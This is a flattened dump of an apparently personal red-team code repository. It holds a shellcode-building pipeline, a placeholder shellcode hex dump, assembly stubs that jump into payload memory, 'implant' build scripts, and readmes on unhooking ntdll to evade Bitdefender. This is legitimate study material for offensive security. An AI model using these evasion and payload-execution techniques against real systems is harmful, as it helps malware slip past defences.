https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "UgH6OIScwCTMo75t+Bb7MMmzMHyfpbovZJg01aBN5tOWC/vBgW/Xz9BZIfIFjdEDlr0+3rj0VELTK64tWo6i3Q==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_QueueUserAPC\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/Readme.md:
--------------------------------------------------------------------------------
1 | A lot of this code is based on/borrowed from course work from CRTO/CRTO II by ZeroPoint Security (ZPS).
2 |
3 | For more information on the course(s) check out some ZPS courses:
4 | https://training.zeropointsecurity.co.uk/collections
5 |
--------------------------------------------------------------------------------
/C/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C/code_exec/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C/code_exec/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/code_exec/system.bin
--------------------------------------------------------------------------------
/C/custom_payload/Readme.md:
--------------------------------------------------------------------------------
1 | All the files necessary to compile and run custom Linux payloads.
2 |
--------------------------------------------------------------------------------
/C/custom_payload/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "0xTriboulet"
4 |
5 | with open("dump.txt") as f:
6 | lines = f.readlines()
7 | last = lines[-1]
8 | print("unsigned char cmd[] = ")
9 | for line in lines:
10 | new_line = []
11 | for i in range (0,len(line)-1,2):
12 | new_line.append("\\x"+line[i:i+2])
13 | if line is last:
14 | print('"'+''.join(new_line)+'";')
15 | else:
16 | print('"'+''.join(new_line)+'"')
17 |
--------------------------------------------------------------------------------
/C/custom_payload/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me
--------------------------------------------------------------------------------
/C/custom_payload/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me.o
--------------------------------------------------------------------------------
/C/custom_payload/call_me_2.bak:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/call_me_2.bak
--------------------------------------------------------------------------------
/C/custom_payload/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54883ec4848b82f7573722f6269
2 | 6e48ba2f6563686f000000488955d848
3 | 8945d0488d5dd053488d1c246a0048b8
4 | 5041594c4f41442048ba474f45532048
5 | 4552b94521000048894df0488955e848
6 | 8945e0488d4de05151488d3424488b3b
7 | ba00000000b83b0000000f05b83c0000
8 | 000f05002e7368737472746162002e74
9 | 657874000
10 |
--------------------------------------------------------------------------------
/C/custom_payload/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/C/custom_payload/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/custom_payload/system.bin
--------------------------------------------------------------------------------
/C/custom_payload/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/C/meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 | Repository of meterpreter binaries aimed at facilitating research
2 |
--------------------------------------------------------------------------------
/C/meterpreter/meterpreter_re_me.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/meterpreter_re_me.exe
--------------------------------------------------------------------------------
/C/meterpreter/patchmeup_meterpreter.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/meterpreter/patchmeup_meterpreter.exe
--------------------------------------------------------------------------------
/C/undetectable/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | x86_64-w64-mingw32-gcc.exe .\undetectable.c -o undetectable.exe -l"ws2_32" -Wdiscarded-qualifiers
--------------------------------------------------------------------------------
/C/undetectable/undetectable.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C/undetectable/undetectable.exe
--------------------------------------------------------------------------------
/Certs/Certificate-Steve S.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Certificate-Steve S.pdf
--------------------------------------------------------------------------------
/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Machine_Learning_for_Red_Teams_Steve S - 2024-06-05.pdf
--------------------------------------------------------------------------------
/Certs/Malware Development Advanced - Vol.1-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.1-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Malware Development Advanced - Vol.2-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Malware Development Advanced - Vol.2-certificate.pdf
--------------------------------------------------------------------------------
/Certs/RTMLS_2024-06-14.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/RTMLS_2024-06-14.pdf
--------------------------------------------------------------------------------
/Certs/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Certs/Red-Team-Ops-Completion.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-Completion.jpg
--------------------------------------------------------------------------------
/Certs/Red-Team-Ops-II-Completion.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Red-Team-Ops-II-Completion.jpg
--------------------------------------------------------------------------------
/Certs/Sektor7_Malware Development Essentials-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Essentials-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Sektor7_Malware Development Intermediate-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Malware Development Intermediate-certificate.pdf
--------------------------------------------------------------------------------
/Certs/Sektor7_Windows Evasion-certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Sektor7_Windows Evasion-certificate.pdf
--------------------------------------------------------------------------------
/Certs/THM-JrPenTester.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-JrPenTester.png
--------------------------------------------------------------------------------
/Certs/THM-Offensive_Pentesting.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Offensive_Pentesting.png
--------------------------------------------------------------------------------
/Certs/THM-Red_Team_Learning_Path.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/THM-Red_Team_Learning_Path.png
--------------------------------------------------------------------------------
/Certs/Udemy_Linux-PEAS.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Linux-PEAS.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Exploit-Dev.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Exploit-Dev.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Malware-Net-Java.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Malware-Net-Java.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Radare2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Radare2.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_RE-Windows-GUI.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_RE-Windows-GUI.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_Windows-PEAS.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_Windows-PEAS.jpg
--------------------------------------------------------------------------------
/Certs/Udemy_build_undetectable_malware_in_c.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/Udemy_build_undetectable_malware_in_c.jpg
--------------------------------------------------------------------------------
/Certs/VHL_Advanced+_Certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Advanced+_Certificate.pdf
--------------------------------------------------------------------------------
/Certs/VHL_Basic_Certificate.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/VHL_Basic_Certificate.pdf
--------------------------------------------------------------------------------
/Certs/ZPS_DevOps_For_Pentesters.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/ZPS_DevOps_For_Pentesters.jpg
--------------------------------------------------------------------------------
/Certs/zps_initial_access_cert.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Certs/zps_initial_access_cert.jpg
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/Readme.md:
--------------------------------------------------------------------------------
1 | Beats Bitdefender by unhooking using a clean copy of ntdll hardcoded into the binary. Unfortunately has to drop the copy of ntdll to disk before loading it, still working on a way around that.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | try:
4 | plaintext = open(sys.argv[1], "rb").read()
5 | except:
6 | print("File argument needed! %s " % sys.argv[0])
7 | sys.exit()
8 |
9 |
10 | #open("payload.out",'wb').write(plaintext)
11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W1 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
4 | del *.obj
--------------------------------------------------------------------------------
/Cpp/BYOdll/version1/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version1/implant.exe
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/Readme.md:
--------------------------------------------------------------------------------
1 | Beats BitDefender by unhooking all function calls by reloading ntdll hardcoded into the binary. ntdll is stored as a local variable in main so this program needs a BEEFY stack to manage it. This program suffers from the same limitation of dropping the hardcoded copy of ntdll to disk before loading.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /EHsc /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:4000000
4 | del *.obj
--------------------------------------------------------------------------------
/Cpp/BYOdll/version2/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/BYOdll/version2/implant.exe
--------------------------------------------------------------------------------
/Cpp/BYOdll/version3/Readme.md:
--------------------------------------------------------------------------------
1 | This version loads a reflective NTDLL, copies it over (overwrites) the hooked NTDLL, and is then free to execute malicious behaviors.
2 |
--------------------------------------------------------------------------------
/Cpp/BYOdll/version3/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm.exe
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm_better.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_better.exe
--------------------------------------------------------------------------------
/Cpp/badAsm/badAsm_rx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/badAsm/badAsm_rx.exe
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/bad_fn_ptr.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.log:
--------------------------------------------------------------------------------
1 | bad_fn_ptr.cpp
2 | Creating library C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.lib and object C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exp
3 | bad_fn_ptr.vcxproj -> C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\x64\Debug\bad_fn_ptr.exe
4 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.obj
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/bad_fn_ptr.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.34.31933:TargetPlatformVersion=10.0.22621.0:
2 | Debug|x64|C:\Users\0xtriboulet\Desktop\maldev\Zz.Projects\experiments\9.bad_fn_ptr\bad_fn_ptr\|
3 |
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/bad_fn_ptr.tlog/link.write.2u.tlog
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/bad_fn_ptr/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exe
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.exp
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.lib
--------------------------------------------------------------------------------
/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/bad_fn_ptr/x64/Debug/bad_fn_ptr.pdb
--------------------------------------------------------------------------------
/Cpp/call_stack/compile.bat:
--------------------------------------------------------------------------------
1 | nasm -f win64 payload.asm -o payload.o
2 | nasm -f win64 ramp.asm -o ramp.o
3 | x86_64-w64-mingw32-g++.exe main_clean.cpp ramp.o -o main_clean.exe -masm=intel
--------------------------------------------------------------------------------
/Cpp/call_stack/main_clean.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_clean.exe
--------------------------------------------------------------------------------
/Cpp/call_stack/main_dirty.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/main_dirty.exe
--------------------------------------------------------------------------------
/Cpp/call_stack/payload.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/payload.o
--------------------------------------------------------------------------------
/Cpp/call_stack/ramp.asm:
--------------------------------------------------------------------------------
1 | section .text
2 | default rel
3 | bits 64
4 |
5 | global onRamp
6 | global offRamp
7 |
8 | ;nasm -f win64 ramp.asm -o ramp.o
9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx
10 | pop rax ; corrupt previous frame
11 | push rdx
12 | lea rax, [offRamp] ; get offRemp address
13 | push rax ; if payload returns, it'll return to our off ramp
14 | jmp rcx ; execute exec_mem
15 |
16 | offRamp: ; slide back into normal execution (dangerous!)
17 | mov rax, [r13] ; get return_address
18 | jmp rax ; jump to return_address
19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps
--------------------------------------------------------------------------------
/Cpp/call_stack/ramp.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/call_stack/ramp.o
--------------------------------------------------------------------------------
/Cpp/clean_stacks/baseline.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/baseline.exe
--------------------------------------------------------------------------------
/Cpp/clean_stacks/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/implant.exe
--------------------------------------------------------------------------------
/Cpp/clean_stacks/implant_backup_1.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel
5 |
6 | /* Reference
7 | asm ( "assembly code"
8 | : output operands optional
9 | : input operands optional
10 | : list of clobbered registers optional
11 | );
12 | */
13 |
14 | extern "C" void onRamp(PVOID exec_mem, PVOID ret_addr);
15 |
16 | int main(void){
17 | printf("Implant running...\n");
18 |
19 | void * ret_addr = NULL;
20 | asm("lea %0, [rip+ReturnHere];"
21 | : "=r" (ret_addr) // ret_addr <- rip+ReturnHere
22 | : // no inputs
23 | : // no predefined clobbers
24 | );
25 |
26 | printf("Return address: %p\n",ret_addr); // get return address
27 |
28 | asm("int3; ReturnHere:;"); //ret_addr
29 | printf("Exiting implant...\n");
30 | }
31 |
32 |
33 | // nasm -f win64 payload.asm -o payload.o
34 | // nasm -f win64 ramp.asm -o ramp.o
35 | // x86_64-w64-mingw32-g++.exe implant.cpp -o implant.exe -masm=intel
--------------------------------------------------------------------------------
/Cpp/clean_stacks/payload.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/payload.o
--------------------------------------------------------------------------------
/Cpp/clean_stacks/ramp.asm:
--------------------------------------------------------------------------------
1 | section .text
2 | default rel
3 | bits 64
4 |
5 | global onRamp
6 |
7 | onRamp: ; onRamp (exec_mem, return_address) // rcx, rdx
8 | mov r13, rdx ; preserve our return address
9 | push r13 ; put return_address on the stack
10 | lea r13, [rsp] ; get return_address
11 |
12 | lea r15, offRamp ; preserve offRamp address
13 | push r15 ; put r15 on the stack
14 | lea r15, [rsp] ; get offRamp address
15 |
16 | sub rsp, 0x20 ; protect our addresses
17 |
18 | jmp rcx ; jmp to our payload
19 |
20 | offRamp:
21 |
22 | loop:
23 | pop rax ; pop value off the stack
24 | cmp rsp,r13 ; check if r15 = rsp
25 | jne loop ; loop if there's still garbage on the stack
26 |
27 | ret
28 |
29 |
30 |
--------------------------------------------------------------------------------
/Cpp/clean_stacks/ramp.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/clean_stacks/ramp.o
--------------------------------------------------------------------------------
/Cpp/create_process/CreateProcess.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main(){
5 |
6 | STARTUPINFO si;
7 | si.cb = sizeof(si); //THE CB MEMBER OF STARTUPINFO SHOULD CONTAIN THE SIZE OF THE STRUCTURE TAKEN FROM THE CREATEPROCESSW DOC
